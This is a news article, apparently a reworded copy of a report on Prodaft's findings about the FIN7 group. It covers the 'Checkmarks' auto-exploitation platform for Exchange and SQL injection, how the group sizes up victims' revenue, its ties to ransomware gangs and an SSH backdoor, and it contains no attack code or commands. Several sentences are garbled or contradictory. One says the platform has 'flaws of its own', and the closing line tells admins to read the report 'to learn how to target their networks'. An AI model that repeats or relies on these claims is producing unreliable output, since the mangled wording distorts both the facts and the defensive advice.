The notorious FIN7 hacking group uses an automated attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to hack into corporate networks, steal data, and select targets for ransomware attacks based on financial size.
The threat intelligence team at Prodaft has been following the operations of FIN7 for years.
In a report shared with BleepingComputer before publication, Prodaft reveals details about FIN7’s internal hierarchy, affiliations with various ransomware projects, and a new backdoor system used for stealing files from compromised networks.
Russian-speaking threat actor FIN7 has been active since at least 2012.
They’ve been associated with attacks against ATMs, hiding malicious software in teddy bears, and setting up fake cybersecurity firms.
Auto-attacking Microsoft Exchange
There are multiple Microsoft Exchange remote code execution and privilege elevation vulnerabilities that can be detected by the ‘Checkmarks’ auto- attack system discovered by Prodaft.
Checkmarks were used by FIN7 to discover vulnerable endpoints inside companies’ networks and exploit them to gain access.
FIN7 gained access to the target networks through various exploits, including their own custom code and public available PoCs.
The Checkmarks attack platform has flaws of its own, one of which is the MS Exchange flaws.
Checkmarks performs post-exploitation steps after the initial attack stage, such as email extract from Active Directory and Exchange server information gathering.
New victims are added to a central panel where operators can see more details about the compromised endpoint.
Next, FIN7’s internal’marketing’ team scrutinizes new entries and adds comments on the Checkmarks platform to list victims’ current revenue, number of employees, domain, headquarters details, and other information that can be used to determine if the firm is worth the time and effort.
According to the Prodaft report shared with BleepingComputer, if a firm is deemed to have a sufficient market size, the pentester leaves a comment for the admin on how the server connection can be used, how long the attack can last, and how far it can go.”
The due diligence that goes into evaluating a firm’s size and financial status is notable, with the FIN7’s marketing team collecting information from diverse sources, including Owler.
According to Prodaft, FIN7’s Checkmarks platform has already been used to penetrate 8,147 companies, most of them based in the United States.
Ransomware and SSH backdoors
The Black Basta gang was connected to the FIN7 group in November of 2022, while Mandiant linked the Russian hackers to Darkside operations in April of the same year.
Further evidence of the DarkSide connection was discovered by Prodaft after they found what appeared to be ransom notes and files from the ransomware operation.
Darkside, REvil, and LockBit were found to have communications with each other from the retrieved logs.
According to the logs, FIN7 likes to have a back door on extorted victims’ networks even after they have paid the ransom, either to sell access to other groups or to try a new attack themselves in the future.
A recent addition to FIN7’s arsenal allows them to steal files from breached devices using reverse SSH connections through an onion domain.
The Checkmarks platform shows how threat actors are industrializing public exploits to perform large-scale attacks with a global impact.
According to the investigation, FIN7 targets everyone and evaluates how valuable they are in a second phase.
Prodaft has provided indicators of compromise in their report for the SSH-based backdoor. It is important for admins to review the report to learn how to target their networks.
